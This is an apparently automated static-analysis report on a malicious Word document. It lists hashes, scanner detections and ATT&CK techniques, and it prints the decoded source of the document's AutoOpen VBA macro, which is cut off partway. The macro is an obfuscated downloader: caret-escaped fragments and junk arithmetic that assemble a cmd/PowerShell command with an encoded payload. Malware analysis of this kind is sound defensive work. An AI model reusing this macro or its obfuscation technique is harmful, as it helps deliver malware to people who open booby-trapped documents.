Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 3f5b446bc3dc77dd…

MALICIOUS

Office (OLE)

Size: 86.8 KB
Created: 2018-08-20 19:03:00
Authoring application: Microsoft Office Word
First seen: 2018-10-07
MD5: 2543b2fa1b7fd2a2be86a3451b68029b
SHA-1: f7f35cad09cf970ee332c3632b522ec8d1d9ad78
SHA-256: 3f5b446bc3dc77dd04adbc849905d76bffb20ca719a21e9db2234de659224147
Risk Score: 142

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro. The macro constructs an obfuscated command line and attempts to execute it through PowerShell, most likely to download and run a second-stage payload. The ClamAV detection name 'Doc.Downloader.Valyria-6665587-0' further supports this downloader behavior. The presence of an AutoOpen macro indicates that the code runs automatically as soon as the document is opened.

Heuristics (5)

  • ClamAV: Doc.Downloader.Valyria-6665587-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Valyria-6665587-0
  • VBA macros detected [medium, 1 related finding] OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 44656 bytes
SHA-256: 784b5c8c99e852d9632a95621dd36ee9d8d898274185d8d9665954306f3fbf73

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "HMQYWlKi"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "lHjrUoaS"
Function YLRWtFl()
On Error Resume Next
IsArray CDate(OBqQBV - vwBoSo)
   VKnsP = jNUCF - GzIwdK * uILnN + iVkjl
   IsArray Sqr(NijkS)
   VarType LCase(22305 * sXaAn / GIakYk / zFPihb)
JWnPFpPBYbP = "md" + " " + "/v^:" + "O/c   " + CStr(Chr(AZFWNzKIbEC + kmwivNvKmPatz + 34 + iEMNYiD + KwuRwjfh)) + "  s^E" + "^t " + "   ^ " + "^4^I^" + "u^m^=p^" + "ow)x^" + "s^h)^l" + "^l"
VarType Log(4)
jQmUiAfmmT = "^ " + "-)^ ^" + "[^A" + "?^[^A" + "^+oA" + "cA^A9" + "^A^" + "+^4A^" + "ZQ" + "?3" + "^AC^0^A"
VKnsP = MZsJI + hSYLb
aWjna = "^bw?^" + "iA" + "+^o^A" + "^ZQ^?j^" + "A^H^Q^A" + "^I^" + "A?^O^A" + "^+UAd" + "AA" + "u^A" + "'c^AZQ^"
VarType hKLqwO - zVRCR / 25307 * oMqtj
   VarType Tan(bpTbNX)
   VarType Int(AEfpiw)
IdHMzZBSu = "?^i" + "A^EM^" + "AbA?p" + "A+^U^Ab" + "g?0^"
VKnsP = Oct(82734 / 19718)
   VKnsP = 57875 - owrmk
   VarType Sqr(moizDq)
   VarType CDec(3266)
   IsArray Hex(7028)
iKozGM = "AD^s" + "A[A^?" + "^" + "M^AHo^A" + "^Z^gA^" + "9^A"
VKnsP = CDec(uLVMB)
kUfAjpfs = "C" + "c" + "^A^\A" + "^?0A" + "^HQ^A" + "c^A^A^"
VarType Str(59989 * lXYtC + 95065 + pTMscI)
   IsArray Hex(3)
   VarType 4111 / QQIpa
   VKnsP = Str(kvXWT)
   VarType Second(nSItk)
KEanfHfbd = ",^AC" + "^" + "8AL^w^" + "?z^A+E" + "^" + "A" + "b^g?vAC" + "4^A^\" + "^Q" + "^?^" + "]^AC^" + "8^A"
VarType MiPYu + VLiAr - wfbIR - YqwEKY
   IsArray uXWTX + nCjDad + 65604 * RqpSZX
MwXQhj = "(^" + "A?^`A+I" + "A^\^g" + "^?^ZAD" + "M^" + "Ab" + "^g?A^A" + "+"
VarType TimeValue(253183858)
   IsArray CBool(558)
   IsArray Second(jdULI / VLrEwj)
fNYIbMQkWaF = "^g^Ad" + "^A" + "?0A^H^A" + "^" + "A^" + "Og" + "A" + "vAC" + "8" + "A^Z^"
YLRWtFl = JWnPFpPBYbP + jQmUiAfmmT + aWjna + IdHMzZBSu + iKozGM + kUfAjpfs + KEanfHfbd + MwXQhj + fNYIbMQkWaF
   VKnsP = CDate(14519 / qWqzp / JojZdU * 68430)
   VarType 50642 / 72586
   VarType 85356 / PhBjzq
End Function
Function pzijAUz()
On Error Resume Next
IsArray Oct(94)
rJTDM = "w?]" + "AH^U" + "^A)^g" + "^" + "?" + "v^" + "A^+^w" + "A^" + "d^Q" + "?^iA" + "C^4Ac^"
VKnsP = CDbl(9)
   VarType Sqr(ikmcLT)
IaofrC = "g?" + "1^A" + "C" + "^8^AM^w" + "^?QAH" + "^IA\^Q" + "^?^UA^'" + "^`^AQA" + "^?"
IsArray Val(ZjlQL / rNzQnO - kcwAlT + wwLpan)
   VarType cJssD + 45380 - csnsn + lCAOS
   IsArray Oct(hdLhCc / DtfdYk)
PrGtnqWztjj = "o^AH^Q" + "AdA" + "?^wA^D" + "o^A^L" + "w" + "Av^" + "A^" + "+YAb^" + "w?]^A" + "+U^A)A"
VKnsP = KUCZY + UdBTmq
   VarType QONkT + jcmQE
LpKjzHJDK = "?" + "^0AH" + "^I^AY" + "Q?^`A" + "^+^`A^b" + "^g" + "^?nA+^"
VKnsP = paHITz - huimu / 51839 - DrQih
   VKnsP = Str(1)
   IsArray 39495 + BzhLv
   VarType Hex(2975)
   VarType Oct(pXfIAp)
tARnhVQERrj = "Y" + "^Acg?^" + "4^A" + "C^" + "4" + "Abw?^]^" + "A^+" + "cA" + "^Lw"
VKnsP = Month(VUiYJ)
   IsArray Month(18492 / dUjKf + aUcUos - IOwUQ)
wDSsRwb = "?^mAD^Y" + "^A^WQ^" + "?" + "^]^A" + "^+`^" + "A^"
VarType nWZMSR * wotiGO
jVfvlLjiiq = "QA^?" + "o^A^H^Q" + "A^d^A" + "^" + "?w^A^D" + "o^AL^w^" + "Av^A+^E" + "^A^bA?" + "^]A+UAY" + "Q^?`^A^" + "H`A\^" + "A^?v"
VKnsP = CDate(1)
GzKwcPUFB = "^A^" + "HM" + "^A^d^" + "A^A^u" + "^A" + "^+`Ad" + "^A^?oA+" + "`A^bg" + "?" + "#^A" + "C" + "^4^A^b" + "^g^?"
VarType Log(FBwKm)
   IsArray CDec(XEvGWY)
   VKnsP = MZNjbT - uNFfDt / 12835 / iqwKz
   IsArray Log(zXobJ)
FlSHPV = "lAH" + "^Q^A" + "LwA^#^" + "A^+^" + "IA^W" + "^g^?" + "^" + "A^A" + "+^gAdA?"
IsArray CStr(89)
   VarType Int(kAYGj)
   VarType 28348 / MRoZpu / 77 + EmHDj
GLqUTGKB = "0" + "AH^AA^" + "O" + "^g^AvAC" + "^8^A" + "^ZQ?^2" + "A+" + "8" + "A^L" + "^g" + "?nA" + "+^U" + "A^Lw?(^"
pzijAUz = rJTDM + IaofrC + PrGtnqWztjj + LpKjzHJDK + tARnhVQERrj + wDSsRwb + jVfvlLjiiq + GzKwcPUFB + FlSHPV + GLqUTGKB
   VKnsP = TypeName(HDalfY)
   IsArray Fix(3300)
   VKnsP = CDbl(wUDJ
... (truncated)